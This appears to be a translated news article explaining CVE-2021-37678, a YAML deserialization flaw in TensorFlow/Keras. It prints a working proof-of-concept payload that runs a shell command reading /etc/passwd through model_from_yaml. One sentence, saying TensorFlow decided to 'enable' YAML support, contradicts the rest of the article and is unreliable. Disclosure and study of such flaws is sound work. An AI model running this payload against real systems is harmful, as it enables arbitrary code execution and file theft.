TensorFlow is a Python-based machine learning and artificial intelligence project developed by Google. To fix a code execution security vulnerability, TensorFlow has decided to discontinue support for YAML. YAML (Yet Another Markup Language) is a readable format for expressing data serialization. YAML references a variety of other languages, including C, Python, Perl, and data formats from XML to email.
Cve-2021-37678: TensorFlow untrusted deserialization vulnerability
Security researcher Arjun Shibu found a security vulnerability in TensorFlow and Keras — CVE-2021-37678. This vulnerability is due to the untrusted deserialization vulnerability caused by insecure handling of YAML, which allows an attacker to execute arbitrary code when applying the Keras model in the deserialization YAML format. The CVSS score of the YAML deserialization vulnerability is 9.3. Deserialization vulnerabilities occur when an application reads forged or malicious data from an untrusted source. After reading and deserializing data, the application may trigger DoS attack conditions or even execute arbitrary code of the attacker.
The vulnerability comes from TensorFlow’s yaml.unsafe_load() function:
The vulnerable yaml.unsafe_load() function call in TensorFlow
The unsafe_load function, which deserializes YAML data, resolves all labels, including input from insecure or untrusted sources. Ideally, the unsafe_load function is only called if the input comes from a trusted source. However, attackers exploit this mechanism to execute code by injecting malicious payload into already-serialized YAML data.
The PoC exploit code of this vulnerability is as follows:
from tensorflow.keras import models payload = ''' !! python/object/new:type args: ['z', !!python/tuple [], {'extend': !!python/name:exec }] listitems: "__import__('os').system('cat /etc/passwd')" ''' models.model_from_yaml(payload)Copy the code
TensorFlow no longer supports YAML
After the vulnerability was submitted, TensorFlow decided to enable YAML support and use JSON deserialization.
But TensorFlow is not the only project to use YAML unsafe_load, which is widely used in Python projects. GitHub has thousands of search results that reference this function, and developers have come up with a solution:
Search results on GitHub using unsafe_load
TensorFlow has also released a patch for this vulnerability. The affected and fixed versions are as follows:
【 Network security learning materials 】